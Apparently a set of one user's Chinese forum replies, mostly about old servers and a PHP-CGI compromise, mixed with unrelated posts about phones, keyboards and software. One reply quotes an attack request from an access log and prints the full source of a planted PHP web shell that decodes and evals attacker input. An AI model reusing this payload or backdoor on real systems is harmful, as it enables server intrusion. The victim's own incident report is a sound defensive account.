刚刚爆出 OpenSSH 爆高危漏洞 CVE-2024-6387 ，我的 CentOS 7 逃过一劫，相信你的也是，老系统不是轻易换的，我的 windows server2003 就逃过多少劫了。

@sampeng
@ShinichiYao
这个攻击，只要符合条件，1.中文操作系统，2.php 版本是最高的。这个是利用 php 的漏洞，处理%2d 字符的漏洞，是没法儿预防的，开了 80 或者 443 都可以攻击。如果 php 无法升级，暂时可以用 Rewrite 重定向处理，然后屏蔽掉 system,exec,shell_exec,passthru,popen 加固一下。

@Sw0rt1
@hgert
@ShinichiYao
@chf007
使用多款杀毒软件扫描过了，处理这些，还发现了一个被植入的挖矿程序.moneroocean ，从文件日期看，是十几天前，是不是我的系统太老了，导致其无法进一步捣乱。服务器存在的时间比较久，里面的数据有点多而且复杂，阿里云对 2003 也提供的充分的支持。如果是换成新的 windows 或者 linux ，是不是就容易中招了呢？！
服务器已经手动做了很多防护，针对远程桌面的攻击比较频繁，防护的方法除了改端口改用户名等，我还写了一个日志分析程序，如果遇到攻击远程桌面，会给发邮件，微信就会提醒。

攻击日志就像下面的，数量不多。
128.199.166.165 - - [08/Jun/2024:16:01:43 +0800] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 200 12
从日志看，apache 居然返回的 200 的成功标志？
我自己请求这个字符串时，返回的是 500 ，居然不是 404 。

@euph
@cnevil
@hefish
@wtks1
果然是，我在 web 根目录里发现个文件叫 Zq91u4b.php ，里面的内容就是有关 payload 的，暂时未发现服务器异常，可能是所有的程序都是自己写的原因，勒索软件暂时没有得逞，刚刚做了个快照，想想怎么完善一下，谢谢大家。那个 php 文件原文是这样的。
><?php
>@session_start();
>@set_time_limit(0);
>@error_reporting(0);
>function encode($D,$K){
> for($i=0;$i<strlen($D);$i++) {
> $c = $K[$i+1&15];
> $D[$i] = $D[$i]^$c;
> }
> return $D;
>}
>$pass='dddzzz';
>$payloadName='payload';
>$key='f25200d5d90fa403';
>if (isset($_POST[$pass])){
> $data=encode(base64_decode($_POST[$pass]),$key);
> if (isset($_SESSION[$payloadName])){
> $payload=encode($_SESSION[$payloadName],$key);
> if (strpos($payload,"getBasicsInfo")===false){
> $payload=encode($payload,$key);
> }
> eval($payload);
> echo substr(md5($pass.$key),0,16);
> echo base64_encode(encode(@run($data),$key));
> echo substr(md5($pass.$key),16);
> }else{
> if (strpos($data,"getBasicsInfo")!==false){
> $_SESSION[$payloadName]=encode($data,$key);
> }
> }
>}
>

去年这个时间，自己的华为手机实在是抗不住了，我买的 realme q5 pro ，感觉挺好，又给母亲买了同款，很不错，可以看看升级款

遇到这种情况，一定是公司配电脑，朋友在外企就是这种情况，windows 笔记本，为了碎银几两，这样做是正常的，又不是原则问题，自己无法安装软件。你那边还有商量的余地，毕竟还可以申请 IT 远程安装。

机械键盘,敲击声音太大了，影响到周围的人，很让人讨厌，就和抽烟的人一样让别人讨厌，就顾着自己爽的人很自私。

@crac @gentrydeng 刚才到阿里云上看了一下，企业邮箱没有免费的呢，最少 5 个用户的是 600 元

1999 年，1k

根据你和网友的反馈，我是这样认为的。提示 no such file or directory: ./protoc ，你是使用什么工具执行去执行这个 protoc 的，自己的 shell ，或者 crontab ，或者是服务程序，或者是 webserver 里的一个点击，等等，这个很关键，因为你是使用了相对路径点撇./，这样执行一个程序是很省事，但是有隐患的，你使用了相对路径，相对谁呢？你在 shell 里，当然是相对于当前你运行的那个窗口的 shell ，其它的执行环境就不一定了。你在你当前 shell 窗口下执行正确（排除 32 位和 64 位和链接库的问题），那就看可能是执行环境的问题了

我给母亲买老年机 real Q5Pro ，发现还行，自己也入手一台当主力机。半年前买的，1.5k ，pdd 旗舰店入手，现在应该是涨价了。各方面都可以。

1 、桌面上有个 install Ubuntu 的图标。
2 、/ monunt 点只有 2G ，文件系统名叫/cow,分区非常多，比正常的多太多了
3 、没有编译环境、什么环境都没有。运营的环境至少安装个 gcc 吧。
这些都是异常情况。

更改用户名，密码不是特别复杂，8 、9 年了，都没扫描出来，看日志都是外国的 IP 。

失业就失业呗，如果是挣了十年的钱，那已经比我退休后挣的总和要多了。

还有这种事儿！这也太不靠谱了。
我用的阿里云，12 年的，windows2003 ，很老很老的了，现在用着还很惬意。
用过橙云，擅自改外网 IP 地址，还没通知，从此绕路。

以前用 ES 文件浏览器的“远程管理器”和 ftp ，安卓版本升级后，这个 APP 变得流氓得很。我改用 CX 文件管理器，里面的从 pc 访问和 ftp 。

能的，但是要求必须版本一致，比如以前是 home ，你也要安装 home 版本。win10 或者 11 是联网自动激活的，都是正版。